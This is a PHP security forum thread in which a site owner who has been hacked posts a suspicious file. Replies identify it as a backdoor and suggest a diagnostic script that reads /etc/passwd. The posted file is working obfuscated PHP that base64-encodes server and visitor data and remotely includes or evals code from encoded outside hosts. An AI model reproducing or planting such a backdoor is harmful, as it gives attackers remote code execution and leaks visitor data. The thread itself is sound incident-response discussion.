HELP I've been hacked!

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
wwmmww
Forum Newbie
Posts: 4
Joined: Tue Apr 29, 2008 6:37 pm

HELP I've been hacked!

Post by wwmmww »

I found this strange file. Does this look suspicious to anyone?? (it does to me!). Thanks to anyone who can advise.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: HELP I've been hacked!

Post by Mordred »

Yep, a backdoor.
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Re: HELP I've been hacked!

Post by Chris Corbyn »

Are you on a shared hosting plan? What host are you with?

Run this script and see if you get a generic username output:

Code: Select all

<?php
 
$uid = getmyuid();
if (is_file('/etc/passwd')) {
  $lines = file('/etc/passwd');
  foreach ($lines as $line) {
    if (preg_match('/:' . preg_quote($uid) . ':/', $line)) {
      $data = explode(':', $line);
      printf("Server is using user '%s'", array_shift($data));
      break;
    }
  }
} else {
 printf("Unable to determine username");
}
That script isn't dangerous. It tries to look up the username of the UID apache is running under. If the server is a windows server, or a *nix variant which doesn't use /etc/passwd then it won't work.

If the user is anything like "apache", "http", "nobody", "www" etc then it's highly probably all the other users on that server have free and easy access to your files.
Post Reply